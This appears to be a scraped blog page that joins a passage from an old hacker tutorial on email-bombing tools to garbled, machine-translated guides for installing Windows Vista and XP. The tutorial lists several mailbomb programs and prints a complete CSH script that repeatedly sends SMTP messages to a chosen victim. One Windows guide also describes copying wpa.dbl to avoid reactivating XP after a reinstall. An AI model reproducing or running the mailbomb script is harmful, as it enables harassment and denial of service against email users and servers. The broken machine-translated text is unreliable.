The Unabomber utility is a rudimentary tool, but one must give the  author credit for humor. Unabomber offers no list-linking  capabilities. It is essentially a flat e-mail bomber and does no more than send messages over and over. One interesting element is that  Unabomber comes with a help function. The signature files for this  utility are:

 unabomb.zip
 unabomb.exe

eXtreme Mail:

eXtreme Mail is well programmed. It includes an interactive  installation process that performs all the routine checks for disk  space, resources, and so forth. It also observes proper registry
conventions and is easily uninstalled.
The signature files for this product are:

 xmailb1.zip
 xmailb1.exe

 Homicide:

The Homicide utility was written by a youngster with the moniker Frys  and was discontinued in 1996. The author claims that he wrote the  utility because Up Yours 2.0 was inadequate as an e-mail bombing  tool. However, with the release of Up Yours 3.0, Frys apparently  decided to discontinue any further releases. As of March 1997, it is  available only at a very few select sites.
The signature files for this utility are:

 homicide.zip
 homicide.exe

The UNIX MailBomb:

This UNIX e-mail bomber is reportedly written by CyberGoat, an  anonymous cracker out in the void. The signature file on this one is  mailbomb.csh.
It is in fact a CSH shell script and not a program, since Unix has such powerful shells and shell scripting capabilities. It's main advantage is that it is very small in size.

 #!/bin/csh
 # Anonymous Mailbomber
 # do chmod u+rwx where filename is the name of the file
 that
 # you saved it as.
 #*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED
 # "teltemp"
 # IN THE DIRECTORY IT IS RUN FROM ****
 clear
 echo -n "What is the name or address of the smtp server ?"
 set server = $<
 #echo open $server 25 > teltemp
 echo quote helo somewhere.com >> teltemp
 #The entry for the following should be a single name (goober),
 #not goober@internet.address .
 echo -n "Who will this be from (e.g. somebody) ?"
 set from = $<
 echo quote mail from: $from >> teltemp
 echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? "
 set name = $<
 echo quote rcpt to: $name >> teltemp
 echo quote data >> teltemp
 echo quote . >> teltemp
 echo quote quit >> teltemp
 echo quit >> teltemp
 echo -n "How many times should it be sent ?"
 set amount = $<
 set loop_count = 1
 while ($loop_count <= $amount)
 echo "Done $loop_count"
 ftp -n $server 25 < teltemp
 @ loop_count++
 end
 rm ./teltemp
 echo $amount e-mails complete to $name from $from@$server
 # --------------------
 # MailBomb by CyBerGoAT

 Bombtrack:

The Bombtrack utility is reportedly the first mail-bombing tool  written for the Macintosh platform. It is another run-of-the-mill  bombing utility, widely available at cracker sites across the  Internet. The signature file for this application is:

bombtrack.bin

FlameThrower:

FlameThrower is a bombing utility written for Macintosh. Its main  purpose is list linking; it allows the user to subscribe his target  to 100 lists. The binary is quite large, considering its intended purpose. The signature for this file is:

flamethrower10b.sit.bin



Mail Bombing Countermeasures

============================
There are many utilities out there (such as pop3free, pop3clean etc') that will clean up POP3 mail accounts. To learn more about POP3, refer to BSRF's POP3 tutorial.
As for web-based mail accounts, you can always save any real mails that you got and delete all the rest (any web-based mail account should have such a feature).
To report such attacks, send a message to your abuse team (for example: if you have an account at hotmail.com, send your mail to abuse@hotmail.com).

As for list linking, if you're facing a large attack and cannot unsubscribe from all of the mailing list by yourself, consider switching to another account. Sorry, there's no other way.

Source :
by Tolda [2000]
With comments and additions by R a v e N.
Written for BSRF.
Homepage: http://blacksun.box.sk
Friday, December 12, 2008

Installing Windows Vista process

Like Windows XP aau other versions of Windows, the installation process is easy. Likewise with Windows Vista. The installation of Windows Vista is much more easily. In this installation process you can make a direct boot from the DVD format the hard drive and direct you, then continue the installation process was conducted. You can also upgrade the way it is when using previous versions of Windows, such as Windows XP Professional.

If the installation process by upgrading it after you enter a master's in Windows Vista to a CD or DVD drive, then immediately appear for the installation. In this case you live in pressing the button Install Now.

Furthermore, these impressions of your stay to wait until the installation process directly implemented. At this installation you only occasionally pressing Next button and enter the CD-Key that you have. After the installation is finished you are asked to do activasi through the Internet. After activasi Windows Vista is ready digunakan.Publish

Install Windows XP Without Redo Activation

Any users of Windows XP to Windows activation to the Microsoft site in 30 days 

Differences in the light most felt that new users migrate to Windows XP is the addition of Windows Product Activation or WPA. This program will force users to do the activation of Windows to Microsoft's site within 30 days. 
  If in that time has been specified as a user you also do not activation, your Windows will be locked and can be used again after you activate them. 

The same rules also apply to start new software various outstanding recently. We take anti-virus product from Symantec, Norton AntiVirus 2004. This software also has implemented activation before you can use them in full. Options activation of the public is given through the Internet or by phone. 


Seeing this trend, activation, you may ask questions, to what the actual activation software? The idea behind the creation of activation is to reduce software piracy. With the activation, software developers can ensure that the product is used in accordance with the user license purchasing. For example, a user has a Windows XP license for one user, the user then activate Windows it. If he has a computer and want to install Windows without buying additional licenses, then the Windows computer on which the two will not be used for more than 30 days. The reasons, Windows can not be activated because of licensing issues. 

Although the application of the Product Activation was the solution for the developers program, but how this can be a stumbling block for the owner of the license official. Why? Because, if the computer owner to make re-install the operating system after activation, it can not activate Windows for keduakalinya. But, not angry and disappointed with the problem. PCplus have the solution! Follow these steps before you reinstall Windows. 

1. Click [Start] [All Programs] [Accessories] [Windows Explorer]. 
  2. Create a new folder, for example, with the name of the backup on the drive D. 
  3. Go to the folder C: WINDOWSsystem32. If you install Windows on another drive, you can make with the drive that you use. 
  4. On the right side of a window will appear that states that the information in the file folder on the condition hidden. Click the hyperlink [Show the contents of this folder] to display the contents of the system32 folder. 
  5. After the system32 folder open, look for a file named wpa.dbl. 
  6. Wpa.dbl copy the file to the folder that you previously created (D: ackup), 

If you have to do the above steps, Now is the time you reinstall Windows XP. You can format the hard disk and do â € œFresh Installâ €? with the safe. After the new Windows installed on your computer: 

1. Restart the computer and press the [F8] on the keyboard before the computer into the Windows operating system. 
  2. Select [Safe Mode] to enter the mode œamanâ € â €?. 
  3. In Safe mode, restart Windows Explorer. 
  4. Go to the folder where you store the backup files wpa.dbl, and then going back copy-file to the folder C: WINDOWSsystem32. 
  5. When you paste the file wpa.dbl, information will appear that the file has been available in the system32 folder. Click [Yes] to overwrite. 
  6. The final step, restart Windows and see, Windows XP does not ask for activation again!

How to Install Windows XP

There are many ways to install Windows XP on the work station. If you install the hard disk format, and then boot the computer through a CD-ROM, this is called a clean install. You need to run a clean install if: 
  »Computers you use Windows 3.0, Windows 3:11, Windows 95 and Windows 3:51 
  »Computers you do not use products from Microsoft 
  »Computer you still do not have the operating system 
  Let me start by running the Windows XP installation from a CD. I will take your computer does not have any operating system on it. 
  1. Reboot your PC and insert the CD-ROM Windows XP Professional to the plate. You must first hand so that you can boot the system via the CD-ROM. 
  2. After the computer's finished running, the setup routine for Windows XP will begin. See Diagram below the following: 

Prefix program shows the process of copying the files that are required by Windows XP. During this process started, the setup program will run Windows XP (minimum version) before it can launch the setup program. Specifically, the current Windows will load pemacu (drivers) for certain uses of the hardware. 


  3. Once the setup program is complete load all the files pemacu necessary, you can see a list schedule for the partition of your system. See Diagram below: 

Diagram shows up in your system still does not have a partition. To create a partition, you can use this utility. NOTE: If you already have a system partition, you can remove the partition and replace it with a new partition. 
  To remove the partition, press a button D. To create a partition, press a button C. 
  4. If you choose to create a new partition, you will take to display the following. 

Diagram shows the display above the Partition. You are given the option to put a size that you want to partition created. If you do not understand the meaning of partition, I suggest you use the overall size of the partition is maximized, press a button to enter to the next rank. NOTE: Remember that Windows XP requires a hard disk size of at least 1.5GB. 
  5. Then, you will be asked for the format of your new partition. There are several options which is NTFS format (Quick), FAT (Quick), NTFS and FAT. Select the desired type of format and press Enter button to go to the next rank. 

6. After you select the type of format, the setup program will launch the format in the partition that created. Depending on the size and type of partition file system is selected, this process will take between 1 and 10 minutes to complete. 

Diagram shows the process of formatting the partition. 
  7. Windows XP will then launch the process of copying files from the source of the Windows XP CD into the new partition. This process will take several minutes. 

Diagram the process of copying the files into the Windows hard disk. 
  8. After copying the files of Windows, the system will reboot. Once completed reboot your computer, the setup program will switch to a GUI mode, the current system will identify and install the hardware in your PC. In this process will also cause your screen blinks for some time because the system seeks to identify the type of video card that is being used. 

9. Back in GUI mode, you will be asked to review the Regional and Language settings. You also need to enter the Product Key for Windows XP. Key Product numbers can be found in the Windows XP CD labels. 

10. Click Next. On the next shelf, enter a computer name and password Administrator. Click the Next button, and then on the display, select the Time Zone for your area. 
  11. In the next step, you will set the configuration in the Network Settings, there are two options given: Typical and Custom. If you choose Typical settings, your system will be paired with the following components: 
  - Client for Microsoft Networks 
  - QoS Packet scheduler 
  - File and Print Sharing for Microsoft Networks 
  - TCP / IP, DHCP configured for 
  If you choose Custom settings, you will be given the opportunity to add network configuration and set manually. You do not need to worry about this, if you make a mistake in the configuration, you can still change it later. 

Diagram shows the configuration in the Network Settings. 
  12. Next, you need to specify the type of network you want to be accompanied, as there WorkGroup or Domain. If you choose to join the domain, you will be asked to enter information username and password to confirm your identity. Then click the Next button. 

Diagram shows the display to select WorkGroup or Domain. 
  13. Now you can let your system menyalinkan files that are required. During the process of copying this, your system will install the program in the Start Menu, to register and cast components of the Windows files from the Temporary folder. 

14. When the setup process is almost ready, you will make the system upgrade and reboot. If everything is in good condition, your system will continue to load Windows XP Professional, and you may be using your new operating system. Make the installation of software third-party software programs such as utility, officials of software, Internet applications as soon as you enter the successful Windows XP desktop.